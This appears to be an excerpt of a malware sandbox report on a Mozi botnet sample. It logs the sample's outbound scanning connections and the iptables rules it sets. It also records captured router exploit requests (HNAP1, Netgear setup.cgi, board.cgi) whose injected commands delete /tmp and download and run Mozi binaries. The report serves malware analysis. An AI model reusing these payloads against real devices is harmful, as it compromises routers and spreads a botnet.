                Source: global trafficTCP traffic: 192.168.2.20:54210 -> 206.117.114.232:8443
                Source: global trafficTCP traffic: 192.168.2.20:44944 -> 222.133.41.233:5555
                Source: global trafficTCP traffic: 192.168.2.20:34578 -> 99.155.210.76:8443
                Source: global trafficTCP traffic: 192.168.2.20:45528 -> 84.78.78.130:8080
                Source: global trafficTCP traffic: 192.168.2.20:57140 -> 114.194.154.112:8443
                Source: global trafficTCP traffic: 192.168.2.20:59960 -> 118.126.149.210:81
                Source: global trafficTCP traffic: 192.168.2.20:37068 -> 102.245.187.124:8080
                Source: global trafficTCP traffic: 192.168.2.20:48564 -> 178.227.209.201:8080
                Source: global trafficTCP traffic: 192.168.2.20:35660 -> 89.89.254.121:7574
                Source: global trafficTCP traffic: 192.168.2.20:40876 -> 161.117.155.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:35122 -> 47.125.48.176:5555
                Source: global trafficTCP traffic: 192.168.2.20:43976 -> 215.181.140.3:81
                Source: global trafficTCP traffic: 192.168.2.20:53318 -> 166.221.246.62:7574
                Source: global trafficTCP traffic: 192.168.2.20:56982 -> 1.21.220.147:8443
                Source: global trafficTCP traffic: 192.168.2.20:44516 -> 215.199.64.119:8080
                Source: global trafficTCP traffic: 192.168.2.20:34308 -> 213.35.187.150:7574
                Source: global trafficTCP traffic: 192.168.2.20:45786 -> 205.13.133.200:81
                Source: global trafficTCP traffic: 192.168.2.20:51100 -> 191.252.54.212:52869
                Source: global trafficTCP traffic: 192.168.2.20:47264 -> 174.166.72.112:8080
                Source: global trafficTCP traffic: 192.168.2.20:55356 -> 89.18.94.49:52869
                Source: global trafficTCP traffic: 192.168.2.20:41066 -> 66.220.233.134:8443
                Source: global trafficTCP traffic: 192.168.2.20:50846 -> 208.243.26.125:5555
                Source: global trafficTCP traffic: 192.168.2.20:33342 -> 95.80.182.34:8443
                Source: global trafficTCP traffic: 192.168.2.20:48468 -> 129.9.82.238:52869
                Source: global trafficTCP traffic: 192.168.2.20:34874 -> 126.12.240.246:81
                Source: global trafficTCP traffic: 192.168.2.20:49698 -> 41.9.236.30:37215
                Source: global trafficTCP traffic: 192.168.2.20:44546 -> 115.114.122.15:52869
                Source: global trafficTCP traffic: 192.168.2.20:52378 -> 55.59.39.140:8443
                Source: global trafficTCP traffic: 192.168.2.20:41488 -> 216.211.142.82:37215
                Source: global trafficTCP traffic: 192.168.2.20:58570 -> 64.104.185.88:5555
                Source: global trafficTCP traffic: 192.168.2.20:49562 -> 65.99.212.62:5555
                Source: global trafficTCP traffic: 192.168.2.20:32920 -> 209.34.156.41:8080
                Source: global trafficTCP traffic: 192.168.2.20:38992 -> 190.21.153.214:7574
                Source: global trafficTCP traffic: 192.168.2.20:39230 -> 58.205.220.62:5555
                Source: global trafficTCP traffic: 192.168.2.20:51852 -> 125.120.31.95:7574
                Source: global trafficTCP traffic: 192.168.2.20:56814 -> 41.244.197.101:8443
                Source: global trafficTCP traffic: 192.168.2.20:43750 -> 138.208.123.55:8080
                Source: global trafficTCP traffic: 192.168.2.20:51466 -> 183.51.240.43:8080
                Source: global trafficTCP traffic: 192.168.2.20:42914 -> 35.244.23.134:49152
                Source: global trafficTCP traffic: 192.168.2.20:54738 -> 130.52.53.47:81
                Source: global trafficTCP traffic: 192.168.2.20:56558 -> 220.221.221.108:8080
                Source: global trafficTCP traffic: 192.168.2.20:54948 -> 152.90.233.152:5555
                Source: global trafficTCP traffic: 192.168.2.20:55164 -> 27.169.136.209:49152
                Source: global trafficTCP traffic: 192.168.2.20:38372 -> 40.99.150.234:8443
                Source: global trafficTCP traffic: 192.168.2.20:49502 -> 74.96.156.31:81
                Source: global trafficTCP traffic: 192.168.2.20:47774 -> 193.51.46.187:81
                Source: global trafficTCP traffic: 192.168.2.20:44296 -> 216.109.183.183:49152
                Source: global trafficTCP traffic: 192.168.2.20:47590 -> 126.191.100.107:49152
                Source: global trafficTCP traffic: 192.168.2.20:47550 -> 125.153.37.11:5555
                Source: global trafficTCP traffic: 192.168.2.20:39112 -> 114.132.33.150:49152
                Source: global trafficTCP traffic: 192.168.2.20:60534 -> 155.0.76.184:8080
                Source: global trafficTCP traffic: 192.168.2.20:46608 -> 188.115.113.70:5555
                Source: global trafficTCP traffic: 192.168.2.20:43454 -> 79.231.62.91:49152
                Source: global trafficTCP traffic: 192.168.2.20:44782 -> 136.133.36.86:5555
                Source: global trafficTCP traffic: 192.168.2.20:59126 -> 51.188.61.166:8080
                Source: global trafficTCP traffic: 192.168.2.20:35234 -> 12.4.137.28:8443
                Source: global trafficTCP traffic: 192.168.2.20:35780 -> 208.226.139.99:8080
                Source: global trafficTCP traffic: 192.168.2.20:60242 -> 71.129.56.39:52869
                Source: global trafficTCP traffic: 192.168.2.20:49370 -> 82.33.25.142:8443
                Source: global trafficTCP traffic: 192.168.2.20:40060 -> 99.7.230.121:81
                Source: global trafficTCP traffic: 192.168.2.20:53220 -> 87.236.72.115:8080
                Source: global trafficTCP traffic: 192.168.2.20:55288 -> 106.165.30.99:5555
                Source: global trafficTCP traffic: 192.168.2.20:60864 -> 164.83.153.43:52869
                Source: global trafficTCP traffic: 192.168.2.20:45296 -> 89.28.59.57:49152
                Source: global trafficTCP traffic: 192.168.2.20:51774 -> 133.89.144.60:7574
                Source: global trafficTCP traffic: 192.168.2.20:40538 -> 136.86.4.57:8080
                Source: global trafficTCP traffic: 192.168.2.20:46918 -> 148.33.215.101:52869
                Source: global trafficTCP traffic: 192.168.2.20:55352 -> 187.248.127.144:8080
                Source: global trafficTCP traffic: 192.168.2.20:56308 -> 60.81.104.12:49152
                Source: global trafficTCP traffic: 192.168.2.20:34138 -> 36.120.123.216:52869
                Source: global trafficTCP traffic: 192.168.2.20:52034 -> 216.189.38.126:5555
                Source: global trafficTCP traffic: 192.168.2.20:60450 -> 122.16.34.10:81
                Source: global trafficTCP traffic: 192.168.2.20:34828 -> 69.108.163.108:49152
                Source: global trafficTCP traffic: 192.168.2.20:56598 -> 147.121.39.228:7574
                Source: global trafficTCP traffic: 192.168.2.20:35588 -> 219.217.46.6:81
                Source: global trafficTCP traffic: 192.168.2.20:60950 -> 121.89.157.177:52869
                Source: global trafficTCP traffic: 192.168.2.20:60216 -> 200.177.82.26:52869
                Source: global trafficTCP traffic: 192.168.2.20:54950 -> 95.145.77.101:5555
                Source: global trafficTCP traffic: 192.168.2.20:40288 -> 47.59.64.91:81
                Source: global trafficTCP traffic: 192.168.2.20:32940 -> 75.154.37.154:8080
                Source: global trafficTCP traffic: 192.168.2.20:44980 -> 119.192.203.59:5555
                Source: global trafficTCP traffic: 192.168.2.20:47606 -> 146.33.219.4:7574
                Source: global trafficTCP traffic: 192.168.2.20:54352 -> 75.178.23.163:52869
                Source: global trafficTCP traffic: 192.168.2.20:47506 -> 45.1.148.196:5555
                Source: global trafficTCP traffic: 192.168.2.20:60564 -> 157.48.19.236:8443
                Source: global trafficTCP traffic: 192.168.2.20:35052 -> 68.116.62.82:37215
                Source: global trafficTCP traffic: 192.168.2.20:32946 -> 33.11.4.154:8443
                Source: global trafficTCP traffic: 192.168.2.20:49746 -> 194.176.233.134:8080
                Source: global trafficTCP traffic: 192.168.2.20:46522 -> 178.221.126.119:7574
                Source: global trafficTCP traffic: 192.168.2.20:55064 -> 38.116.11.222:37215
                Source: global trafficTCP traffic: 192.168.2.20:39102 -> 179.128.137.93:5555
                Source: global trafficTCP traffic: 192.168.2.20:52894 -> 6.36.182.64:81
                Source: global trafficTCP traffic: 192.168.2.20:46148 -> 151.29.44.170:8443
                Source: global trafficTCP traffic: 192.168.2.20:42380 -> 162.53.49.185:52869
                Source: global trafficTCP traffic: 192.168.2.20:45344 -> 168.119.247.129:7574
                Source: global trafficTCP traffic: 192.168.2.20:43220 -> 136.79.119.26:52869
                Source: global trafficTCP traffic: 192.168.2.20:39634 -> 60.229.225.32:8080
                Source: global trafficTCP traffic: 192.168.2.20:45634 -> 58.167.45.11:52869
                Source: global trafficTCP traffic: 192.168.2.20:38652 -> 61.40.32.6:7574
                Source: global trafficTCP traffic: 192.168.2.20:43210 -> 6.51.176.149:8443
                Source: global trafficTCP traffic: 192.168.2.20:44510 -> 178.99.201.110:7574
                Source: global trafficTCP traffic: 192.168.2.20:34826 -> 129.212.171.46:5555
                Source: global trafficTCP traffic: 192.168.2.20:40684 -> 111.14.162.42:37215
                Source: global trafficTCP traffic: 192.168.2.20:41314 -> 138.193.244.97:52869
                Source: global trafficTCP traffic: 192.168.2.20:35440 -> 106.231.94.244:37215
                Source: global trafficTCP traffic: 192.168.2.20:57628 -> 94.140.74.218:49152
                Source: global trafficTCP traffic: 192.168.2.20:49032 -> 24.202.186.134:8080
                Source: /bin/sh (PID: 4618) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4652) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4655) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4699) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
                Source: /bin/sh (PID: 4708) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4736) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4742) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4761) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
                Source: /bin/sh (PID: 4877) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
                Source: /bin/sh (PID: 4880) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
                Source: /bin/sh (PID: 4883) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
                Source: /bin/sh (PID: 4892) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
                Source: /bin/sh (PID: 4950) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
                Source: /bin/sh (PID: 4985) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
                Source: /bin/sh (PID: 5011) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
                Source: /bin/sh (PID: 5014) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
                Source: /bin/sh (PID: 5019) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
                Source: /bin/sh (PID: 5044) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
                Source: /bin/sh (PID: 5079) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
                Source: /bin/sh (PID: 5105) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
                Source: /bin/sh (PID: 5121) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                Source: /bin/sh (PID: 5144) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                Source: /bin/sh (PID: 5152) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
                Source: /bin/sh (PID: 5183) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                Source: /bin/sh (PID: 5201) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5204) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5207) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5211) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
                Source: /bin/sh (PID: 5232) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5268) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5303) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
                Source: /bin/sh (PID: 5333) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 107.170.200.206:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 34.117.168.156:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 23.218.46.16:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcro
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 206.212.1.199:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0 Host: 51.178.69.101:80 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m` Content-Length: 640 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 38.87.83.34:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 206.212.1.199:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
